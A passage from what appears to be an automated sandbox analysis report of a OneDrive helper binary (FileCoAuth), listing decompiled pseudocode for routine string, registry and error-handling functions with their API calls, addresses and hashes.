				_t30 =  <  ? _a12 : _t28 - _t13;
				if(_t31 != _t24) {
					if(E00E935F4(_t24, _t25, _t30, _t30, 0) != 0) {
						if( *((intOrPtr*)(_t24 + 0x14)) >= 0x10) {
							_t24 =  *_t24;
						}
						if( *((intOrPtr*)(_t31 + 0x14)) < 0x10) {
							_t26 = _t31;
						} else {
							_t26 =  *_t31;
						}
						if(_t30 != 0) {
							memcpy(_t26, _a8 + _t24, _t30);
						}
						 *(_t31 + 0x10) = _t30;
						if( *((intOrPtr*)(_t31 + 0x14)) < 0x10) {
							_t16 = _t31;
						} else {
							_t16 =  *_t31;
						}
						 *((char*)(_t16 + _t30)) = 0;
					}
				} else {
					E00E9353E(_t25, _t13 + _t30);
					E00E9356F(_t31, 0, _a8);
				}
				return _t31;
			}












    0x00e93157
    0x00e9315c
    0x00e93160
    0x00e93165
    0x00e93167
    0x00e9316c
    0x00e93173
    0x00e93173
    0x00e9317e
    0x00e93184
    0x00e931a7
    0x00e931ad
    0x00e931af
    0x00e931af
    0x00e931b5
    0x00e931bb
    0x00e931b7
    0x00e931b7
    0x00e931b7
    0x00e931bf
    0x00e931c9
    0x00e931ce
    0x00e931d5
    0x00e931d8
    0x00e931de
    0x00e931da
    0x00e931da
    0x00e931da
    0x00e931e0
    0x00e931e0
    0x00e93186
    0x00e93189
    0x00e93196
    0x00e93196
    0x00e931ea

    APIs
    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,00E934F3,?,?,?,?,?,?,?,00E92EA7,?,00000000), ref: 00E93173
      • Part of subcall function 00E935F4: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,00E93503,?,00000000,?,?,?,?,?,00E92EA7,?,00000000), ref: 00E93607
    • memcpy.MSVCR120 ref: 00E931C9
    Strings
    • invalid string position, xrefs: 00E9316E
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Xlength_error@std@@Xout_of_range@std@@memcpy
    • String ID: invalid string position
    • API String ID: 4248180022-1799206989
    • Opcode ID: 891686db9e852419f835bedb9ca5e71bb6492508e3fd6f670cdbeb6ca1544ff6
    • Instruction ID: f6f1cae3bbd832beff37365ceb06f08db9bb60ad626156e85723e9c6577f043b
    • Opcode Fuzzy Hash: 891686db9e852419f835bedb9ca5e71bb6492508e3fd6f670cdbeb6ca1544ff6
    • Instruction Fuzzy Hash: DE11A3723013009BDF349E3EDC80A6BB7EAEB85755B11142AF856AB251CB71EF4487A1
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9356F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
    Download Yara Rule
    C-Code - Quality: 37%
    			E00E9356F(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _t16;
				int _t18;
				intOrPtr* _t19;
				intOrPtr* _t22;
				void* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t30;
				intOrPtr _t32;
				intOrPtr* _t33;

				_t33 = __ecx;
				_t27 = _a4;
				_t30 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t30 < _t27) {
					__imp__?_Xout_of_range@std@@YAXPBD@Z("invalid string position");
				}
				_t28 = _a8;
				if(_t30 - _t27 > _t28) {
					if(_t28 != 0) {
						if( *((intOrPtr*)(_t33 + 0x14)) < 0x10) {
							_t16 = _t33;
						} else {
							_t16 =  *_t33;
						}
						_t32 = _t30 - _t28;
						_t24 = _t16 + _t27;
						_t18 = _t32 - _t27;
						if(_t18 != 0) {
							memmove(_t24, _t24 + _t28, _t18);
						}
						 *((intOrPtr*)(_t33 + 0x10)) = _t32;
						if( *((intOrPtr*)(_t33 + 0x14)) < 0x10) {
							_t19 = _t33;
						} else {
							_t19 =  *_t33;
						}
						 *((char*)(_t19 + _t32)) = 0;
					}
				} else {
					 *((intOrPtr*)(_t33 + 0x10)) = _t27;
					if( *((intOrPtr*)(_t33 + 0x14)) < 0x10) {
						_t22 = _t33;
					} else {
						_t22 =  *_t33;
					}
					 *((char*)(_t22 + _t27)) = 0;
				}
				return _t33;
			}













    0x00e93575
    0x00e93577
    0x00e9357b
    0x00e93580
    0x00e93587
    0x00e93587
    0x00e9358d
    0x00e93596
    0x00e935af
    0x00e935b5
    0x00e935bb
    0x00e935b7
    0x00e935b7
    0x00e935b7
    0x00e935bd
    0x00e935c0
    0x00e935c5
    0x00e935c7
    0x00e935cf
    0x00e935d5
    0x00e935dc
    0x00e935e0
    0x00e935e6
    0x00e935e2
    0x00e935e2
    0x00e935e2
    0x00e935e8
    0x00e935e8
    0x00e93598
    0x00e9359c
    0x00e9359f
    0x00e935a5
    0x00e935a1
    0x00e935a1
    0x00e935a1
    0x00e935a7
    0x00e935a7
    0x00e935f1

    APIs
    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,?,?,00E9319B,00000000,?,?,?,?,?,?,00E934F3,?,?,?), ref: 00E93587
    • memmove.MSVCR120 ref: 00E935CF
    Strings
    • invalid string position, xrefs: 00E93582
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Xout_of_range@std@@memmove
    • String ID: invalid string position
    • API String ID: 1894236298-1799206989
    • Opcode ID: 81b67b00ff3ed6cd4954fe0e01d4c6ed96b32b3c8acd4cdb8f56026c2790776e
    • Instruction ID: f2e098cfdbb0bc1391a93c1642023f3cd9fcc4f6295be75163214dd53e36e2fe
    • Opcode Fuzzy Hash: 81b67b00ff3ed6cd4954fe0e01d4c6ed96b32b3c8acd4cdb8f56026c2790776e
    • Instruction Fuzzy Hash: D7118E31304241AFDB348E2CD844956B7F9EB8A701716592FE482EB651DBB1EA44CBA1
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9235A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
    Download Yara Rule
    C-Code - Quality: 74%
    			E00E9235A(void* __ebx, void** __ecx, void* _a4, short* _a8, char _a12) {
				signed int _v8;
				void* _v12;
				void* __edi;
				void* __esi;
				signed int _t14;
				void* _t16;
				long _t17;
				long _t21;
				void* _t22;
				long _t26;
				short* _t29;
				int _t31;
				void* _t32;
				void** _t36;
				void* _t37;
				signed int _t38;

				_t22 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t14 =  *0xeb0090; // 0xbb40e64e
				_v8 = _t14 ^ _t38;
				_v12 = _v12 & 0x00000000;
				_t16 = _a4;
				_t29 = _a8;
				_t36 = __ecx;
				_t24 =  *((intOrPtr*)(__ecx + 8));
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					_t9 =  &_a12; // 0xe92729
					_t31 =  *_t9;
					_t17 = RegOpenKeyExW(_t16, _t29, 0, _t31,  &_v12);
				} else {
					_t8 =  &_a12; // 0xe92729
					_t31 =  *_t8;
					_t17 = E00E91F10(_t24, _t16, _t29, _t24, _t31,  &_v12);
				}
				_t26 = _t17;
				if(_t26 == 0) {
					if( *_t36 != _t26) {
						_t21 = RegCloseKey( *_t36);
						 *_t36 =  *_t36 & 0x00000000;
						_t26 = _t21;
					}
					 *_t36 = _v12;
					_t36[1] = _t31 & 0x00000300;
				}
				_pop(_t32);
				_pop(_t37);
				return E00EA29F2(_t22, _v8 ^ _t38, _t29, _t32, _t37);
			}



















    0x00e9235a
    0x00e9235f
    0x00e92360
    0x00e92361
    0x00e92368
    0x00e9236b
    0x00e9236f
    0x00e92372
    0x00e92376
    0x00e92379
    0x00e9237e
    0x00e92392
    0x00e92392
    0x00e9239e
    0x00e92380
    0x00e92384
    0x00e92384
    0x00e9238b
    0x00e9238b
    0x00e923a4
    0x00e923a8
    0x00e923ac
    0x00e923b0
    0x00e923b6
    0x00e923b9
    0x00e923b9
    0x00e923c4
    0x00e923c6
    0x00e923c6
    0x00e923ce
    0x00e923d1
    0x00e923da

    APIs
    • RegOpenKeyExW.ADVAPI32(00000000,80000000,00000000,)',00000000,?,?,?,?,?,00E92729,80000000), ref: 00E9239E
    • RegCloseKey.ADVAPI32(?,?,00E92729,80000000), ref: 00E923B0
      • Part of subcall function 00E91F10: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00E91F24
      • Part of subcall function 00E91F10: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00E91F34
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: AddressCloseHandleModuleOpenProc
    • String ID: )'
    • API String ID: 823179699-2759736101
    • Opcode ID: a785ec0d88edad24a7e7c389e17753c63d083fbdd5f27076b37614471ff2333f
    • Instruction ID: d50a4cd91d5e9dff60066f17daf448748aa9e31f5902e3a2c9ef3230031059e7
    • Opcode Fuzzy Hash: a785ec0d88edad24a7e7c389e17753c63d083fbdd5f27076b37614471ff2333f
    • Instruction Fuzzy Hash: 0E117C3260120ABFDF28CF59C855FAFB7F9EF85711F10456DB546A7240DA74A9408B50
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9823D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51windowCOMMON
    Download Yara Rule
    C-Code - Quality: 73%
    			E00E9823D(void* __ebx, intOrPtr* __ecx, long __edx) {
				signed int _v8;
				short _v12;
				void* __edi;
				void* __esi;
				signed int _t8;
				long _t12;
				void* _t18;
				void* _t28;
				intOrPtr* _t31;
				void* _t32;
				signed int _t33;

				_t27 = __edx;
				_t18 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t8 =  *0xeb0090; // 0xbb40e64e
				_v8 = _t8 ^ _t33;
				_t31 = __ecx;
				if(__edx != 0) {
					_v12 = 0;
					_t12 = FormatMessageW(0x1100, 0, __edx, 0x400,  &_v12, 0, 0);
					_t35 = _t12;
					if(_t12 != 0) {
						E00E98198(_t31, _t35, L"\nLast known error: ", E00E94E74(L"\nLast known error: "));
						E00E98198(_t31, _t35, _v12, E00E94E74(_v12));
						LocalFree(_v12);
						_t28 = _t28;
					}
				}
				_pop(_t32);
				return E00EA29F2(_t18, _v8 ^ _t33, _t27, _t28, _t32);
			}














    0x00e9823d
    0x00e9823d
    0x00e98242
    0x00e98243
    0x00e98244
    0x00e9824b
    0x00e9824f
    0x00e98253
    0x00e98269
    0x00e9826c
    0x00e98272
    0x00e98274
    0x00e98287
    0x00e9829b
    0x00e982a3
    0x00e982a9
    0x00e982a9
    0x00e98274
    0x00e982af
    0x00e982b8

    APIs
    • FormatMessageW.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,?,?,?,00E983E9), ref: 00E9826C
      • Part of subcall function 00E98198: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,Last known error: ,?,?,00E9828C,Last known error: ,00000000,00000000,?,00E983E9), ref: 00E981E1
    • LocalFree.KERNEL32(?,?,00000000,Last known error: ,00000000,00000000,?,00E983E9), ref: 00E982A3
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: FormatFreeLocalMessageXlength_error@std@@
    • String ID: Last known error:
    • API String ID: 1980279784-3866509481
    • Opcode ID: 4ebf1fe5667e14350e9e4b556d786c6f1a91a447f440cc83e4e6f6dcf22d068d
    • Instruction ID: b555134bba047017ef17c7f17b847c886a38599230e1fa63ea0d256ddb97a3fd
    • Opcode Fuzzy Hash: 4ebf1fe5667e14350e9e4b556d786c6f1a91a447f440cc83e4e6f6dcf22d068d
    • Instruction Fuzzy Hash: E401D6B1A00108BFAF086B5ADC06DBFBBBDEF9A710F04016EF505B61A1DFB16E418564
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E92F7A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50threadCOMMON
    Download Yara Rule
    C-Code - Quality: 83%
    			E00E92F7A(void* __eflags) {
				void* _t4;
				long _t6;
				intOrPtr _t7;
				signed int _t10;
				intOrPtr _t13;
				intOrPtr* _t19;

				 *0xeb2328 = 0xeb17e8;
				_t10 = 6;
				_t4 = memset(0xeb17f8, 0, _t10 << 2);
				 *0xeb17ec = _t4;
				 *0xeb17f4 = _t4;
				 *0xeb17f0 = _t4;
				 *0xeb1810 = _t4;
				if(E00E91E96(_t4, 0xeb17f8) >= 0) {
					 *0xeb17ec = 0x24;
				} else {
					 *0xeb2314 = 1;
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t6 = GetCurrentThreadId();
				 *0xeb1818 =  *0xeb1818 & 0x00000000;
				_t19 =  *0xeb2378; // 0xeadba0
				_t13 =  *0xeb237c; // 0xeadba4
				 *0xeb1814 = _t6;
				 *0xeb181c = 0x1388;
				 *0xeb1820 = 0x3e8;
				 *0xeb1824 = 1;
				 *0xeb1826 = 0;
				while(_t19 < _t13) {
					_t7 =  *_t19;
					if(_t7 != 0) {
						 *((intOrPtr*)(_t7 + 0x1c))(1);
						_t13 =  *0xeb237c; // 0xeadba4
					}
					_t19 = _t19 + 4;
				}
				return 0xeb17e8;
			}









    0x00e92f80
    0x00e92f91
    0x00e92f94
    0x00e92f98
    0x00e92f9d
    0x00e92fa2
    0x00e92fa7
    0x00e92fb3
    0x00e92fbe
    0x00e92fb5
    0x00e92fb5
    0x00e92fb5
    0x00e92fd2
    0x00e92fd3
    0x00e92fd4
    0x00e92fd5
    0x00e92fd6
    0x00e92fdc
    0x00e92fe3
    0x00e92fe9
    0x00e92fef
    0x00e92ff4
    0x00e92ffe
    0x00e93008
    0x00e9300f
    0x00e9302c
    0x00e93018
    0x00e9301c
    0x00e93020
    0x00e93023
    0x00e93023
    0x00e93029
    0x00e93029
    0x00e93037

    APIs
      • Part of subcall function 00E91E96: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,8007000E), ref: 00E91E9E
      • Part of subcall function 00E91E96: GetLastError.KERNEL32(?,00000000,00000000,?,8007000E), ref: 00E91EA8
    • GetCurrentThreadId.KERNEL32 ref: 00E92FD6
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: CriticalCurrentErrorInitializeLastSectionThread
    • String ID: ,v$dv
    • API String ID: 2717818847-3304515013
    • Opcode ID: 3073b20ff4e790cf951469ec5587e493b40579962cabeaeb26b66490d33cf5ea
    • Instruction ID: ed6b4d84a4f01c4ac0fb98eb14ab19b70b8d18f84ff666ac66e4a5357153455a
    • Opcode Fuzzy Hash: 3073b20ff4e790cf951469ec5587e493b40579962cabeaeb26b66490d33cf5ea
    • Instruction Fuzzy Hash: 9B119131504391CFDB15CF2AF8147473AE5AB8A324F9452BE9904BB360CB754848CB91
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9F38F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
    Download Yara Rule
    C-Code - Quality: 94%
    			E00E9F38F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t26;
				signed int _t30;
				void* _t38;

				_t37 = __esi;
				_t36 = __edi;
				_push(0x38);
				E00EA3194(E00EA4D3D, __ebx, __edi, __esi);
				_t30 = 0;
				if(E00EA138F() == 0 || E00EA13B2(__edx) != 0) {
					L4:
					_t30 = 1;
				} else {
					 *((intOrPtr*)(_t38 - 0x44)) = 0;
					E00E94E9D(_t38 - 0x40, L"EnableDownlevelInstallOnBluePlus");
					 *(_t38 - 4) = 0;
					E00E94E9D(_t38 - 0x28, L"Software\\Microsoft\\OneDrive");
					 *(_t38 - 4) = 1;
					_t26 = E00E9F1E6(_t38 - 0x28, 0x80000001, _t38 - 0x28, _t38 - 0x40, 0, _t38 - 0x44);
					_t37 = _t26;
					 *(_t38 - 4) = 0;
					E00E94307(_t38 - 0x28, 1, 0);
					 *(_t38 - 4) =  *(_t38 - 4) | 0xffffffff;
					E00E94307(_t38 - 0x40, 1, 0);
					if(_t26 >= 0 &&  *((intOrPtr*)(_t38 - 0x44)) != 0) {
						goto L4;
					}
				}
				return E00EA3152(_t30, _t36, _t37);
			}






    0x00e9f38f
    0x00e9f38f
    0x00e9f38f
    0x00e9f396
    0x00e9f39b
    0x00e9f3a4
    0x00e9f412
    0x00e9f412
    0x00e9f3af
    0x00e9f3b7
    0x00e9f3ba
    0x00e9f3bf
    0x00e9f3ca
    0x00e9f3cf
    0x00e9f3e5
    0x00e9f3ea
    0x00e9f3ec
    0x00e9f3f5
    0x00e9f3fa
    0x00e9f404
    0x00e9f40b
    0x00000000
    0x00000000
    0x00e9f40b
    0x00e9f41b

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9F396
      • Part of subcall function 00EA13B2: memset.MSVCR120 ref: 00EA1403
      • Part of subcall function 00EA13B2: VerSetConditionMask.KERNEL32(00000000,00000000,00000080,00000001), ref: 00EA1421
      • Part of subcall function 00EA13B2: VerifyVersionInfoW.KERNEL32(0000011C,00000080,00000000), ref: 00EA1431
      • Part of subcall function 00E9F1E6: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000008), ref: 00E9F215
      • Part of subcall function 00E9F1E6: RegQueryValueExW.ADVAPI32(00000008,?,00000000,?,?,00000004), ref: 00E9F252
      • Part of subcall function 00E9F1E6: RegCloseKey.ADVAPI32(00000008), ref: 00E9F280
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    Strings
    • EnableDownlevelInstallOnBluePlus, xrefs: 00E9F3AF
    • Software\Microsoft\OneDrive, xrefs: 00E9F3C5
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??3@CloseConditionH_prolog3_InfoMaskOpenQueryValueVerifyVersionmemset
    • String ID: EnableDownlevelInstallOnBluePlus$Software\Microsoft\OneDrive
    • API String ID: 2556130898-1504303525
    • Opcode ID: 1c6b2eee37ad255de326c8da0a021dfc21d0efa922a027aac445fb2d7bab2e17
    • Instruction ID: 8e580e8d1b00681abe3fffe456f63f6db550698c5ccaf28242f191789f9ab9f2
    • Opcode Fuzzy Hash: 1c6b2eee37ad255de326c8da0a021dfc21d0efa922a027aac445fb2d7bab2e17
    • Instruction Fuzzy Hash: 4E0192719012089ECF00EFE08942EEDB7B8AF1A308F542569E511BB1C2DA706F4AC761
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9E731, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
    Download Yara Rule
    C-Code - Quality: 80%
    			E00E9E731(void* __ebx, signed int* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t38;
				signed int _t41;
				signed int _t46;
				signed int* _t48;
				void* _t49;

				_push(0x10);
				E00EA31CA(E00EA4B73, __ebx, __edi, __esi);
				_t48 = __ecx;
				_push(0);
				_t46 = E00E9A924( *(_t49 + 8));
				 *(_t49 - 0x1c) = _t46;
				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
				E00E9B420(_t48,  *_t48, _t48[1], _t46);
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				_t41 = _t48[1];
				 *(_t49 - 0x18) = _t41;
				_t38 =  *_t48;
				asm("cdq");
				 *(_t49 - 0x14) = 0x34;
				 *(_t49 - 0x1c) = (_t41 - _t38) /  *(_t49 - 0x14);
				if(_t38 != 0) {
					if(_t38 != _t41) {
						do {
							E00E94F21(_t38);
							_t38 = _t38 +  *(_t49 - 0x14);
						} while (_t38 !=  *(_t49 - 0x18));
					}
					_push( *_t48);
					L00EA29EC();
				}
				_t48[2] =  *(_t49 + 8) * 0x34 + _t46;
				_t48[1] =  *(_t49 - 0x1c) * 0x34 + _t46;
				 *_t48 = _t46;
				return E00EA313E( *(_t49 - 0x1c) * 0x34 + _t46);
			}








    0x00e9e731
    0x00e9e738
    0x00e9e73d
    0x00e9e73f
    0x00e9e749
    0x00e9e74b
    0x00e9e74e
    0x00e9e75a
    0x00e9e75f
    0x00e9e763
    0x00e9e766
    0x00e9e769
    0x00e9e76f
    0x00e9e770
    0x00e9e77a
    0x00e9e77f
    0x00e9e783
    0x00e9e785
    0x00e9e787
    0x00e9e78c
    0x00e9e78f
    0x00e9e785
    0x00e9e794
    0x00e9e796
    0x00e9e79b
    0x00e9e7a2
    0x00e9e7ab
    0x00e9e7ae
    0x00e9e7b5

    APIs
    • __EH_prolog3_catch.LIBCMT ref: 00E9E738
      • Part of subcall function 00E9A924: ??2@YAPAXI@Z.MSVCR120 ref: 00E9A93D
      • Part of subcall function 00E9A924: ?_Xbad_alloc@std@@YAXXZ.MSVCP120 ref: 00E9A949
    • ??3@YAXPAX@Z.MSVCR120 ref: 00E9E796
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??2@??3@H_prolog3_catchXbad_alloc@std@@
    • String ID: 4
    • API String ID: 2700918851-4088798008
    • Opcode ID: e9256110979df66e445c30072064c7dc61d19eb737a5315d5383e3f461cadb65
    • Instruction ID: a366ef12e6380ba16ac63cad8afe21d5f0e63fb00284286183f8970611e7744d
    • Opcode Fuzzy Hash: e9256110979df66e445c30072064c7dc61d19eb737a5315d5383e3f461cadb65
    • Instruction Fuzzy Hash: 841161719013069BCF25DFA4C98276EBBF1AF98710F24A42DE291BB391D771AA01CF51
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00EA1237, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
    Download Yara Rule
    C-Code - Quality: 94%
    			E00EA1237(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t25;
				signed int _t29;
				void* _t38;
				void* _t39;

				_t39 = __eflags;
				_t37 = __esi;
				_t36 = __edi;
				_push(0x38);
				E00EA3194(E00EA4D3D, __ebx, __edi, __esi);
				_t29 = 0;
				if(E00E9F38F(0, __edx, __edi, __esi, _t39) == 0) {
					L3:
					_t29 = 1;
				} else {
					 *((intOrPtr*)(_t38 - 0x44)) = 0;
					E00E94E9D(_t38 - 0x40, L"DisablePersonalSync");
					 *(_t38 - 4) = 0;
					E00E94E9D(_t38 - 0x28, L"Software\\Microsoft\\OneDrive");
					 *(_t38 - 4) = 1;
					_t25 = E00E9F1E6(_t38 - 0x28, 0x80000001, _t38 - 0x28, _t38 - 0x40, 0, _t38 - 0x44);
					_t37 = _t25;
					 *(_t38 - 4) = 0;
					E00E94307(_t38 - 0x28, 1, 0);
					 *(_t38 - 4) =  *(_t38 - 4) | 0xffffffff;
					E00E94307(_t38 - 0x40, 1, 0);
					if(_t25 >= 0 &&  *((intOrPtr*)(_t38 - 0x44)) != 0) {
						goto L3;
					}
				}
				return E00EA3152(_t29, _t36, _t37);
			}







    0x00ea1237
    0x00ea1237
    0x00ea1237
    0x00ea1237
    0x00ea123e
    0x00ea1243
    0x00ea124c
    0x00ea12b1
    0x00ea12b1
    0x00ea124e
    0x00ea1256
    0x00ea1259
    0x00ea125e
    0x00ea1269
    0x00ea126e
    0x00ea1284
    0x00ea1289
    0x00ea128b
    0x00ea1294
    0x00ea1299
    0x00ea12a3
    0x00ea12aa
    0x00000000
    0x00000000
    0x00ea12aa
    0x00ea12ba

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA123E
      • Part of subcall function 00E9F38F: __EH_prolog3_GS.LIBCMT ref: 00E9F396
      • Part of subcall function 00E9F1E6: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000008), ref: 00E9F215
      • Part of subcall function 00E9F1E6: RegQueryValueExW.ADVAPI32(00000008,?,00000000,?,?,00000004), ref: 00E9F252
      • Part of subcall function 00E9F1E6: RegCloseKey.ADVAPI32(00000008), ref: 00E9F280
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    Strings
    • DisablePersonalSync, xrefs: 00EA124E
    • Software\Microsoft\OneDrive, xrefs: 00EA1264
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: H_prolog3_$??3@CloseOpenQueryValue
    • String ID: DisablePersonalSync$Software\Microsoft\OneDrive
    • API String ID: 2364820520-1797031413
    • Opcode ID: 04f62807460e9a4a589a17b88c03f05debf721b9de2701d211cb9d66f4760c07
    • Instruction ID: 291145b5e9b8f8a39a7608db8cf4141782b3c8cc4f5bc36883d4029882b1c899
    • Opcode Fuzzy Hash: 04f62807460e9a4a589a17b88c03f05debf721b9de2701d211cb9d66f4760c07
    • Instruction Fuzzy Hash: 01017571D012089ECF10EBE0C941EDD77B8EF1A344F442569E501BB1C2D670AB46D761
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E97593, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 42%
    			E00E97593(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t13;
				void* _t16;

				_push(L"User32.dll");
				_t10 =  *((intOrPtr*)( *__ecx + 0x48))();
				_t16 = 0;
				if(_t10 != 0) {
					_t13 = GetProcAddress(_t10, "CalculatePopupWindowPosition");
					if(_t13 != 0) {
						_t16 =  *_t13(_a4, _a8, _a12, _a16, _a20);
					}
				}
				return 0 | _t16 != 0x00000000;
			}






    0x00e9759b
    0x00e975a0
    0x00e975a3
    0x00e975a7
    0x00e975af
    0x00e975b7
    0x00e975ca
    0x00e975ca
    0x00e975b7
    0x00e975d5

    APIs
    • GetProcAddress.KERNEL32(00000000,CalculatePopupWindowPosition), ref: 00E975AF
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
